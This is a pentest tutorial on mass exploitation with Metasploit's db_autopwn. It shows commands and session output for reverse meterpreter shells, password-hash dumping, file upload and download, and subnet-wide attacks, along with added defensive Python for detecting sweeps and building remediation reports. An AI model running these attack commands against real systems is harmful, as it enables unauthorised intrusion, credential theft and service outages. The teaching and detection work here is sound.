These techniques can be used to scan networks by identifying real, exploitable vulnerabilities en masse. Patch management and proper configuration are usually the cures for most of these vulnerabilities, but knowing where the exploitable vulnerabilities are in a network is the first step to focusing your efforts on the most needy areas.
Also, knowing the power that an attacker can wield with such tools can help raise the priority of IT security in risk assessment, especially when reporting to management, so that the correct resources can be applied to reduce risks.
Please be good and do not abuse these techniques to attack systems where you don't have express permission. These techniques can easily cause denial of service, and should only be used for pentesting and educational purposes.
We will be using Backtrack 4 R1 in these examples, as Metasploit and Mysql are already installed and preconfigured.
We are going to be logging our information to a database, so let's start Mysql first:
netstat -antp |grep 3306
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 5852/mysqld
That's MySQL running OK; now let's start Metasploit:
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9959 updated 8 days ago (2010.08.05)
Warning: This copy of the Metasploit Framework was last updated 8 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
First we will select a database driver; in this case we are using MySQL.
Basic db_autopwn pwnage
In the first example we will create a new database called mytest1 using our MySQL credentials, connect to it, and scan a single machine using nmap. Then we will run all the exploits that match the open ports that are found:
db_autopwn -p -t -e -r
The db_autopwn options in this example will match exploits to open ports (-p), show the exploits to be run (-t), run the exploits (-e), and connect back using a reverse meterpreter payload (-r).
This may take several minutes to run, based on the number and types of open ports. HTTP ports can take a long time, due to the large number of exploits included in Metasploit for the well-known HTTP ports. Let the exploitation complete (it may take 10 minutes or more depending on your connectivity to the victim system).
If any exploits are successful, a list of active sessions to the victim machine will be shown. We have a reverse meterpreter session and we can interact with it as follows:
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter TEST-DESKTOP\Ben @ TEST-DESKTOP 192.168.1.64:4444 -> 192.168.1.65:1386
sessions -i 1
[*] Starting interaction with 1...
Once we connect to the session further attacks and analysis can proceed as follows:
1) Obtaining the password hashes:
Loading extension priv...success.
2) Uploading and downloading files:
upload /var/www/plink.exe c:\\
[*] uploading : /var/www/plink.exe -> c:\
[*] uploaded : /var/www/plink.exe -> c:\\plink.exe
download c:\\windows\\system32\\drivers\\etc\\hosts /root/hosts
[*] downloading: c:\windows\system32\drivers\etc\hosts -> /root/hosts
[*] downloaded : c:\windows\system32\drivers\etc\hosts -> /root/hosts
3) Gaining a shell:
Process 2640 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
IP address range exploitation
Attacking multiple machines is where the power of db_autopwn really comes into effect.
Let's scan, and attempt to exploit, a whole subnet in a new database.
Now let's look at the systems we have data on:
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
192.168.1.254 Tue Aug 17 12:51:56 UTC 2010 00:0E:50:EC:B2:A6 speedtouch.lan alive Tue Aug 17 12:51:56 UTC 2010 5 0 default
192.168.1.65 Tue Aug 17 13:22:14 UTC 2010 00:22:3F:E9:89:FF test_system.lan alive Tue Aug 17 13:22:14 UTC 2010 4 0 default
Again, an exploitation of the scanned machines could be run as follows:
db_autopwn -p -t -e -r
However, depending on the number of machines found, running this exploitation may take considerable time.
Additionally, in a live pentest, exploiting many systems at once can cause denial of service headaches on multiple systems. This can be mitigated by focusing the exploitation on particular ports, or particular ranges of machines, and working through the network gradually, logging vulnerabilities in our database as we go.
The exploitation can be focused by IP address range:
db_autopwn -p -t -e -r -I 192.168.1.10
...or by port:
db_autopwn -p -t -e -r -PI 445
...or by both:
db_autopwn -p -t -e -r -PI 445 -I 192.168.1.10
For large numbers of vulnerable machines, this makes the exploitation and analysis more manageable, especially on production networks where live services may be affected and need to be restarted.
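The focused sweeps just described (one port across a range of hosts, or every matching exploit against one host) have a distinctive footprint in firewall logs, which is what a defender should be watching for. The following is an added example, not code from the original article: it parses constructed iptables-style log lines (SRC=/DST=/DPT= fields, an assumed format; adapt LINE_RE to your own firewall or IDS export) and flags any source that fans out across many hosts on one port or many ports on one host.

```python
"""Spot a db_autopwn-style sweep in firewall connection logs.

Added example, not from the original article. The log lines below are
constructed in an iptables-like SRC=/DST=/DPT= format (an assumption about
your log source; adjust LINE_RE for other exports). Mass exploitation shows
up as one source touching many hosts on one port (the '-PI 445' pattern)
or many ports on one host (the '-I <ip>' pattern), usually within minutes.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"SRC=(?P<src>\d+\.\d+\.\d+\.\d+)\s+DST=(?P<dst>\d+\.\d+\.\d+\.\d+).*?DPT=(?P<dpt>\d+)"
)

# Constructed sample: an internal host sweeping port 445 across the subnet,
# then hitting every open port on 192.168.1.65, plus normal web traffic.
SAMPLE_LOG = """\
Aug 17 13:20:01 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.10 PROTO=TCP SPT=40001 DPT=445 SYN
Aug 17 13:20:01 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.11 PROTO=TCP SPT=40002 DPT=445 SYN
Aug 17 13:20:02 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.12 PROTO=TCP SPT=40003 DPT=445 SYN
Aug 17 13:20:02 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.13 PROTO=TCP SPT=40004 DPT=445 SYN
Aug 17 13:21:10 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.65 PROTO=TCP SPT=40005 DPT=445 SYN
Aug 17 13:21:11 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.65 PROTO=TCP SPT=40006 DPT=80 SYN
Aug 17 13:21:11 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.65 PROTO=TCP SPT=40007 DPT=135 SYN
Aug 17 13:21:12 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.65 PROTO=TCP SPT=40008 DPT=139 SYN
Aug 17 13:21:12 fw kernel: IN=eth0 SRC=192.168.1.64 DST=192.168.1.65 PROTO=TCP SPT=40009 DPT=1433 SYN
Aug 17 13:22:30 fw kernel: IN=eth0 SRC=192.168.1.7 DST=192.168.1.254 PROTO=TCP SPT=51000 DPT=80 SYN
Aug 17 13:22:31 fw kernel: IN=eth0 SRC=192.168.1.7 DST=192.168.1.254 PROTO=TCP SPT=51001 DPT=80 SYN
"""


def parse_events(text):
    """Yield (src, dst, dpt) for every line that matches LINE_RE."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("src"), m.group("dst"), int(m.group("dpt"))


def detect_sweeps(events, host_threshold=3, port_threshold=4):
    """Return alerts for sources that fan out across hosts or ports.

    host_threshold: distinct destination hosts on one port before alerting
    port_threshold: distinct destination ports on one host before alerting
    Thresholds are illustrative; tune them to your network's baseline.
    """
    hosts_per_port = defaultdict(set)   # (src, dpt) -> {dst, ...}
    ports_per_host = defaultdict(set)   # (src, dst) -> {dpt, ...}
    for src, dst, dpt in events:
        hosts_per_port[(src, dpt)].add(dst)
        ports_per_host[(src, dst)].add(dpt)

    alerts = []
    for (src, dpt), dsts in sorted(hosts_per_port.items()):
        if len(dsts) >= host_threshold:
            alerts.append({"type": "port_sweep", "src": src, "port": dpt,
                           "targets": sorted(dsts)})
    for (src, dst), ports in sorted(ports_per_host.items()):
        if len(ports) >= port_threshold:
            alerts.append({"type": "host_sweep", "src": src, "dst": dst,
                           "ports": sorted(ports)})
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(parse_events(SAMPLE_LOG)):
        print(alert)
```

Run against a time slice of your logs (a few minutes is enough, since db_autopwn fires its matching exploits back to back); on the sample it raises one port_sweep alert for 445 and one host_sweep alert for 192.168.1.65, and stays quiet on the ordinary web traffic from 192.168.1.7.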
What have we found?
We exploited multiple vulnerabilities in several systems, gained access, and "did stuff", but which vulnerabilities did we exploit on these systems?
You can interrogate the list of successful exploitations by running the following command in Metasploit:
Alternatively, we can go and have a poke around in the mysql database directly, with the following sequence of commands:
mysql -u root -ptoor
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.0.67-0ubuntu6 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
| Database |
| information_schema |
| mysql |
| mysubnet1 |
7 rows in set (0.36 sec)
mysql> use mysubnet1;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
mysql> show tables;
| Tables_in_mysubnet1 |
| clients |
| events |
| hosts |
| loots |
| notes |
| refs |
| reports |
| schema_migrations |
| services |
| tasks |
| users |
| vulns |
| vulns_refs |
| wmap_requests |
| wmap_targets |
| workspaces |
16 rows in set (0.00 sec)
mysql> select * from vulns;
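A flat select from vulns only gives host and service ids, so to turn the database into a fix list you need to join it back to hosts, services and the reference table. The following is an added example, not from the original article: it assumes the Metasploit 3.x table and column names (hosts.address, services.port, vulns.host_id / service_id / name, refs.name, vulns_refs) listed by 'show tables' above, which you should confirm with 'describe <table>;' before using the query in the mysql client. The rows are constructed and loaded into an in-memory sqlite3 copy of those tables so the example runs offline; the join itself is plain SQL that runs unchanged in MySQL.

```python
"""Build a per-host remediation report from the Metasploit database tables.

Added example, not part of the original article. Table and column names are
an assumption based on the Metasploit 3.x schema; the data is constructed.
"""
import sqlite3

# Assumed minimal schema: only the columns the report needs.
SCHEMA = """
CREATE TABLE hosts (id INTEGER PRIMARY KEY, address TEXT, name TEXT, os_name TEXT);
CREATE TABLE services (id INTEGER PRIMARY KEY, host_id INTEGER, port INTEGER, proto TEXT, name TEXT);
CREATE TABLE vulns (id INTEGER PRIMARY KEY, host_id INTEGER, service_id INTEGER, name TEXT);
CREATE TABLE refs (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE vulns_refs (vuln_id INTEGER, ref_id INTEGER);
"""

# Constructed sample: one host with two successful exploits, one clean host.
# Module and reference names are placeholders, not real Metasploit entries.
SAMPLE_ROWS = {
    "hosts": [(1, "192.168.1.65", "test_system.lan", "Microsoft Windows"),
              (2, "192.168.1.254", "speedtouch.lan", None)],
    "services": [(1, 1, 445, "tcp", "smb"),
                 (2, 1, 80, "tcp", "http"),
                 (3, 2, 80, "tcp", "http")],
    "vulns": [(1, 1, 1, "exploit/windows/smb/MODULE-PLACEHOLDER"),
              (2, 1, 2, "exploit/windows/http/MODULE-PLACEHOLDER")],
    "refs": [(1, "CVE-PLACEHOLDER-1"), (2, "MSB-PLACEHOLDER-1"),
             (3, "CVE-PLACEHOLDER-2")],
    "vulns_refs": [(1, 1), (1, 2), (2, 3)],
}

# The report query: one row per recorded vuln, with its host, service and
# the advisory references collected into a single column.
REPORT_SQL = """
SELECT h.address, h.name AS hostname, s.port, s.proto, s.name AS service,
       v.name AS vuln, GROUP_CONCAT(r.name) AS reference_ids
FROM vulns v
JOIN hosts h ON h.id = v.host_id
LEFT JOIN services s ON s.id = v.service_id
LEFT JOIN vulns_refs vr ON vr.vuln_id = v.id
LEFT JOIN refs r ON r.id = vr.ref_id
GROUP BY v.id
ORDER BY h.address, s.port
"""


def load_sample_db():
    """Create the in-memory tables and fill them with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)
    conn.commit()
    return conn


def remediation_report(conn):
    """Return one dict per vuln: what was exploited, where, and which advisories to apply."""
    cur = conn.execute(REPORT_SQL)
    cols = [d[0] for d in cur.description]
    report = []
    for row in cur.fetchall():
        rec = dict(zip(cols, row))
        # GROUP_CONCAT order is not guaranteed, so normalise it to a sorted list.
        rec["reference_ids"] = sorted(rec["reference_ids"].split(",")) if rec["reference_ids"] else []
        report.append(rec)
    return report


def hosts_without_findings(conn):
    """Hosts that were scanned but have no vulns row (still on the patch list, just not exploited)."""
    sql = """SELECT h.address FROM hosts h
             LEFT JOIN vulns v ON v.host_id = h.id
             WHERE v.id IS NULL ORDER BY h.address"""
    return [r[0] for r in conn.execute(sql)]


if __name__ == "__main__":
    db = load_sample_db()
    for rec in remediation_report(db):
        print(f"{rec['address']} ({rec['hostname']}) {rec['port']}/{rec['proto']} "
              f"{rec['vuln']} -> {', '.join(rec['reference_ids'])}")
    print("no findings:", hosts_without_findings(db))
```

The GROUP BY on v.id with non-aggregated columns is accepted by both SQLite and the MySQL 5.0 build shown in the session above; the sorted-list normalisation in remediation_report is there because neither engine promises an order for GROUP_CONCAT.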
We have completed our basic pentest on our subnet, and identified some vulnerable hosts. We know exactly which ones, and what needs to be fixed.
Take a bow for a round of applause, time for a tea break... and that was a basic guide to db_autopwn.
These threats are best mitigated by an IT security program which includes:
- Multiple layers (defense in depth)
- Secure application development/deployment
- Applying recommended safe configurations
- Patch management and software upgrades
- Vulnerability scanning and remediation